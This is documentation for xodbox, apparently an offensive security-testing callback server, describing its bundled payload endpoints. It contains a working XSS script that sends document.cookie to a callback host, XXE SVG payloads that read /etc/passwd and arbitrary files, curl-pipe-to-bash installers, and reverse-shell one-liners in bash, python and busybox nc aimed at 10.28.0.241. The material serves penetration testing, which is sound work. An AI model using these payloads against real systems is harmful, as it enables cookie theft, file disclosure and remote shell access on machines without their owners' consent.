Default payloads that come with xodbox.
Default Payloads Seeds
- 1: Default Header
- 2: Redirect
- 3: Robots TXT
- 4: Inspect
- 5: XSS HTML
- 6: XSS JavaScript
- 7: Default Favicon
- 8: HTML Iframe
- 9: Open Graph
- 10: XXE Callback
- 11: XXE DTD
- 12: XXE SVG Hostname
- 13: XXE SVG Passwd
- 14: XXE SVG Request Params
- 15: XXE System
- 16: Default Page
- 17: In Development Seeds
- 17.1: Build MDaaS
- 17.2: Bind Shell
- 17.3: BusyBox Reverse Shell
- 17.4: Detect platform
- 17.5: List Payloads
- 17.6: Reverse Shell
- 17.7: Simple SSH
- 17.8: Simple SSH Service
- 17.9: WPAD
1 - Default Header
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
2 - Redirect
HTTP redirect to the URL given in the query parameter l, using the query parameter s as the HTTP status code.

| What | Description | GET Parameter |
|---|---|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
3 - Robots TXT
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
4 - Inspect
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
- Plain Text (default, .txt)
- HTML (.html, .html)
- GIF (.gif)
- JPEG (.jpg)
- PNG (.png)
- MP4 (.mp4)
- XML (.xml)
- JSON (.json)
- JavaScript (.js)
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
5 - XSS HTML
/jsc.html
Simple HTML to load simple JS Payload.
6 - XSS JavaScript
/jsc
Simple JS payload. Useful for embedding, or for quickly copying and modifying into an XSS payload to prove execution and exfiltration.

```javascript
(function () {
  // Create an image element; its src request carries the callback data.
  var s = document.createElement("img");
  document.body.appendChild(s);
  // {{.Request.Host}} is filled in by xodbox with the host the payload was served from.
  s.src = "//{{.Request.Host}}/jscb?src=" + window.location + "&c=" + document.cookie;
})();
```
7 - Default Favicon
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
8 - HTML Iframe
/ht
Iframe callback
9 - Open Graph
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
10 - XXE Callback
XXE callback endpoint used by the XXE System seed (xxe-system).
11 - XXE DTD
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
DTD for use by the other XXE payloads.
12 - XXE SVG Hostname
/sh
SVG with XXE payloads; attempts to read /etc/hostname.
13 - XXE SVG Passwd
/sp
Attempts to read /etc/passwd.
14 - XXE SVG Request Params
/sv
Attempts to read whatever file is supplied via the f query parameter.
15 - XXE System
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
16 - Default Page
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
hi
17 - In Development Seeds
Seeds that are not tested or finished.
17.1 - Build MDaaS
17.2 - Bind Shell
curl xodbox/bind.sh|bash
17.3 - BusyBox Reverse Shell
List Payloads
```shell
# bash
bash -i >& /dev/tcp/10.28.0.241/9091 0>&1
0<&196;exec 196<>/dev/tcp/10.28.0.241/9091; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.28.0.241/9091 0<&1 2>&1
#python
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.28.0.241",9091));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
#busybox nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.28.0.241 9092 >/tmp/f
```
17.4 - Detect platform
17.5 - List Payloads
17.6 - Reverse Shell
17.7 - Simple SSH
curl xodbox/ssh.sh|bash
17.8 - Simple SSH Service
17.9 - WPAD
WPAD proxy. Not really useful at the moment; should be more useful in the future.